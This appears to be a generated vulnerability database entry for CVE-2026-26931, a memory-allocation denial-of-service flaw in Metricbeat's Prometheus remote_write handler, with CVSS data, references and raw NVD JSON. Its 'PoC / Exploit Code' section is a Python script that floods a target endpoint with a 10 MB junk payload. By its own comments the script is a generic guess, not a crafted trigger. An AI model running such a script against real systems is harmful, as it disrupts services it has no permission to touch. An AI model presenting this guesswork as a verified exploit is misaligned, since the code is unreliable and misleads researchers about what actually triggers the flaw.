CVE-2026-26931

Description

Memory Allocation with Excessive Size Value (CWE-789) in the Prometheus remote_write HTTP handler in Metricbeat can lead Denial of Service via Excessive Allocation (CAPEC-130).

CVSS Details

CVSS Score

5.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Metricbeat < 8.19.13

Metricbeat < 9.2.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# This is a generic Proof of Concept for DoS via excessive allocation.
# Target the Prometheus remote_write endpoint of Metricbeat.
# Replace TARGET_IP with the actual IP address.

TARGET_URL = "http://TARGET_IP:9200/_prometheus/metrics"

# Attempt to trigger the vulnerability by sending a request
# that implies a very large allocation size or payload.
# The specific trigger depends on the implementation of remote_write.

headers = {
    "Content-Type": "application/x-protobuf",
    "Content-Encoding": "snappy",
    # Some implementations might parse headers for size hints
    "X-Prometheus-Remote-Write-Version": "0.1.0"
}

# Simulate a payload that might cause an overflow or large allocation request.
# In a real scenario, this would be a crafted protobuf message.
payload = b"A" * 10000000  

try:
    print(f"Sending attack payload to {TARGET_URL}...")
    response = requests.post(TARGET_URL, headers=headers, data=payload, timeout=5)
    print(f"Request completed with status: {response.status_code}")
except requests.exceptions.Timeout:
    print("Server timed out (potential successful DoS)")
except Exception as e:
    print(f"An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-26931
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-26931
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-26931/
[4] VulDB https://vuldb.com/cve/CVE-2026-26931
[5] https://discuss.elastic.co/t/metricbeat-8-19-13-9-2-5-security-update-esa-2026-09/385532

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-26931", "sourceIdentifier": "[email protected]", "published": "2026-03-19T17:16:23.320", "lastModified": "2026-03-20T13:39:46.493", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Memory Allocation with Excessive Size Value (CWE-789) in the Prometheus remote_write HTTP handler in Metricbeat can lead Denial of Service via Excessive Allocation (CAPEC-130)."}, {"lang": "es", "value": "Asignación de memoria con un valor de tamaño excesivo (CWE-789) en el gestor HTTP Prometheus remote_write en Metricbeat puede provocar denegación de servicio mediante asignación excesiva (CAPEC-130)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-789"}]}], "references": [{"url": "https://discuss.elastic.co/t/metricbeat-8-19-13-9-2-5-security-update-esa-2026-09/385532", "source": "[email protected]"}]}}